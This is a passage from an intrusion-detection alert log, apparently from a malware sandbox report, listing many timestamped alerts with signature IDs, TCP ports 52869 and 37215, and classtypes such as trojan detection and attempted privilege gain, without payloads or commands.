                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.714340
                      SID:2025132
                      Source Port:34278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:15.422064
                      SID:2027339
                      Source Port:45312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.429491
                      SID:2027339
                      Source Port:36704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.536983
                      SID:2025132
                      Source Port:59140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.080968
                      SID:2027339
                      Source Port:35716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625708
                      SID:2835222
                      Source Port:37880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2829579
                      Source Port:46180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.443193
                      SID:2027339
                      Source Port:45962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.827209
                      SID:2835222
                      Source Port:55366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.174966
                      SID:2025132
                      Source Port:54620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.134757
                      SID:2027339
                      Source Port:55502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.497829
                      SID:2831300
                      Source Port:44440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2835222
                      Source Port:36238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.063033
                      SID:2025132
                      Source Port:38902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.826285
                      SID:2025132
                      Source Port:54732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.488878
                      SID:2027339
                      Source Port:39070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625708
                      SID:2829579
                      Source Port:49580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2835222
                      Source Port:46790
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.627537
                      SID:2831300
                      Source Port:54870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.070537
                      SID:2025132
                      Source Port:35120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.482560
                      SID:2027339
                      Source Port:56094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.419011
                      SID:2831300
                      Source Port:43736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.162873
                      SID:2027339
                      Source Port:37444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.123303
                      SID:2027339
                      Source Port:37316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.470987
                      SID:2027339
                      Source Port:39100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.796614
                      SID:2025132
                      Source Port:49268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:22.925505
                      SID:2027339
                      Source Port:50696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.798059
                      SID:2027339
                      Source Port:43562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.451363
                      SID:2027339
                      Source Port:43750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2835222
                      Source Port:47056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.490951
                      SID:2027339
                      Source Port:54288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.929510
                      SID:2831300
                      Source Port:50794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.465127
                      SID:2025132
                      Source Port:45912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.119639
                      SID:2835222
                      Source Port:39148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2835222
                      Source Port:55760
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.215644
                      SID:2027339
                      Source Port:40762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.593936
                      SID:2027339
                      Source Port:55812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.468265
                      SID:2831300
                      Source Port:55876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.046185
                      SID:2831300
                      Source Port:34784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:30.760053
                      SID:2027339
                      Source Port:42528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.032993
                      SID:2831300
                      Source Port:54458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.430092
                      SID:2831300
                      Source Port:50606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.272821
                      SID:2027339
                      Source Port:46296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.723902
                      SID:2025132
                      Source Port:38530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2829579
                      Source Port:35866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.755466
                      SID:2025132
                      Source Port:36280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.536315
                      SID:2027339
                      Source Port:55692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.144593
                      SID:2025132
                      Source Port:58888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:27.665768
                      SID:2831300
                      Source Port:52100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.459661
                      SID:2027339
                      Source Port:37304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.204720
                      SID:2027339
                      Source Port:49496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.034294
                      SID:2831300
                      Source Port:56624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.534062
                      SID:2831300
                      Source Port:32842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.468386
                      SID:2831300
                      Source Port:50870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.443094
                      SID:2027339
                      Source Port:33650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.954497
                      SID:2027339
                      Source Port:37192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.606709
                      SID:2831300
                      Source Port:36816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.443193
                      SID:2831300
                      Source Port:56352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.998652
                      SID:2025132
                      Source Port:34844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.061893
                      SID:2829579
                      Source Port:40774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2829579
                      Source Port:46868
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.446932
                      SID:2831300
                      Source Port:47044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.025297
                      SID:2027339
                      Source Port:56408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.841574
                      SID:2025132
                      Source Port:50446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:10.376181
                      SID:2027339
                      Source Port:53866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.457721
                      SID:2831300
                      Source Port:56898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2829579
                      Source Port:46080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.575727
                      SID:2027339
                      Source Port:34990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.803945
                      SID:2025132
                      Source Port:54246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.906796
                      SID:2027339
                      Source Port:44148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.097414
                      SID:2027339
                      Source Port:52348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.589156
                      SID:2027339
                      Source Port:35800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2835222
                      Source Port:53414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.253380
                      SID:2025132
                      Source Port:58754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.449834
                      SID:2831300
                      Source Port:34978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.016775
                      SID:2829579
                      Source Port:58834
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2835222
                      Source Port:41908
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2835222
                      Source Port:46836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.404139
                      SID:2027339
                      Source Port:56070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.193739
                      SID:2025132
                      Source Port:38016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.633200
                      SID:2027339
                      Source Port:58120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2829579
                      Source Port:38360
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.515632
                      SID:2831300
                      Source Port:57926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.981181
                      SID:2027339
                      Source Port:50838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2829579
                      Source Port:58368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.015066
                      SID:2025132
                      Source Port:42980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.026941
                      SID:2025132
                      Source Port:49968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.391419
                      SID:2025132
                      Source Port:55294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2835222
                      Source Port:55246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.003073
                      SID:2027339
                      Source Port:49854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.131821
                      SID:2025132
                      Source Port:57960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.158457
                      SID:2027339
                      Source Port:46676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.508603
                      SID:2025132
                      Source Port:57704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.550859
                      SID:2025132
                      Source Port:42582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2835222
                      Source Port:39250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2829579
                      Source Port:50422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.825020
                      SID:2027339
                      Source Port:48692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.137793
                      SID:2831300
                      Source Port:38872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.169432
                      SID:2025132
                      Source Port:40824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2829579
                      Source Port:44376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.386529
                      SID:2835222
                      Source Port:44926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.478141
                      SID:2027339
                      Source Port:47324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2027339
                      Source Port:53598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.663982
                      SID:2027339
                      Source Port:54138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.187277
                      SID:2025132
                      Source Port:36610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.188540
                      SID:2027339
                      Source Port:55586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.142955
                      SID:2025132
                      Source Port:39124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.174834
                      SID:2027339
                      Source Port:58438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347577
                      SID:2831300
                      Source Port:57690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:11.843007
                      SID:2025132
                      Source Port:38292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.738854
                      SID:2027339
                      Source Port:57688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:40.767884
                      SID:2027339
                      Source Port:51510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.223056
                      SID:2027339
                      Source Port:38304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.572723
                      SID:2831300
                      Source Port:52738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:01.438133
                      SID:2025132
                      Source Port:37850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.491493
                      SID:2027339
                      Source Port:48494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2835222
                      Source Port:36174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2835222
                      Source Port:50082
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.311372
                      SID:2829579
                      Source Port:39040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440249
                      SID:2831300
                      Source Port:58176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.813487
                      SID:2027339
                      Source Port:39692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.449959
                      SID:2025132
                      Source Port:45786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.147952
                      SID:2027339
                      Source Port:44758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.497829
                      SID:2027339
                      Source Port:41718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.369730
                      SID:2027339
                      Source Port:48330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2831300
                      Source Port:49538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.238265
                      SID:2829579
                      Source Port:55116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.610603
                      SID:2027339
                      Source Port:49606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.480553
                      SID:2831300
                      Source Port:56136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.148043
                      SID:2027339
                      Source Port:60698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.407056
                      SID:2831300
                      Source Port:35450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2835222
                      Source Port:37378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.582127
                      SID:2027339
                      Source Port:60746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.004179
                      SID:2025132
                      Source Port:33846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.483885
                      SID:2027339
                      Source Port:35874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.893376
                      SID:2027339
                      Source Port:55072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.724263
                      SID:2025132
                      Source Port:38238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.657263
                      SID:2829579
                      Source Port:53120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.420799
                      SID:2027339
                      Source Port:48606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.091191
                      SID:2025132
                      Source Port:54284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.420371
                      SID:2025132
                      Source Port:58754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.799314
                      SID:2025132
                      Source Port:33796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2835222
                      Source Port:48914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.994750
                      SID:2025132
                      Source Port:55442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.279109
                      SID:2027339
                      Source Port:53060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.818180
                      SID:2025132
                      Source Port:37704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.278505
                      SID:2025132
                      Source Port:50296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.345950
                      SID:2027339
                      Source Port:50214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.198211
                      SID:2025132
                      Source Port:38518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.001261
                      SID:2025132
                      Source Port:52992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.153869
                      SID:2027339
                      Source Port:37802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.486069
                      SID:2027339
                      Source Port:40384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.701555
                      SID:2831300
                      Source Port:43960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2835222
                      Source Port:49430
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.348098
                      SID:2831300
                      Source Port:45472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.535101
                      SID:2831300
                      Source Port:33276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.500342
                      SID:2027339
                      Source Port:43528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.939890
                      SID:2829579
                      Source Port:33920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.518986
                      SID:2027339
                      Source Port:57134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.915956
                      SID:2027339
                      Source Port:40222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.739089
                      SID:2027339
                      Source Port:34134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.507640
                      SID:2027339
                      Source Port:35308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.208471
                      SID:2025132
                      Source Port:44098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.606471
                      SID:2027339
                      Source Port:47554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.046185
                      SID:2831300
                      Source Port:39342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.489738
                      SID:2025132
                      Source Port:51722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.562825
                      SID:2831300
                      Source Port:51934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:58.705456
                      SID:2027339
                      Source Port:51420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.339211
                      SID:2027339
                      Source Port:42680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.535864
                      SID:2027339
                      Source Port:49816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2829579
                      Source Port:54818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.834038
                      SID:2027339
                      Source Port:37882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:39.662031
                      SID:2027339
                      Source Port:49906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.550045
                      SID:2027339
                      Source Port:40202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.344940
                      SID:2027339
                      Source Port:57764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.282306
                      SID:2027339
                      Source Port:41200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2829579
                      Source Port:57922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.558741
                      SID:2027339
                      Source Port:44036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:37.923474
                      SID:2027339
                      Source Port:33626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2835222
                      Source Port:38392
                      Destination Port:37215
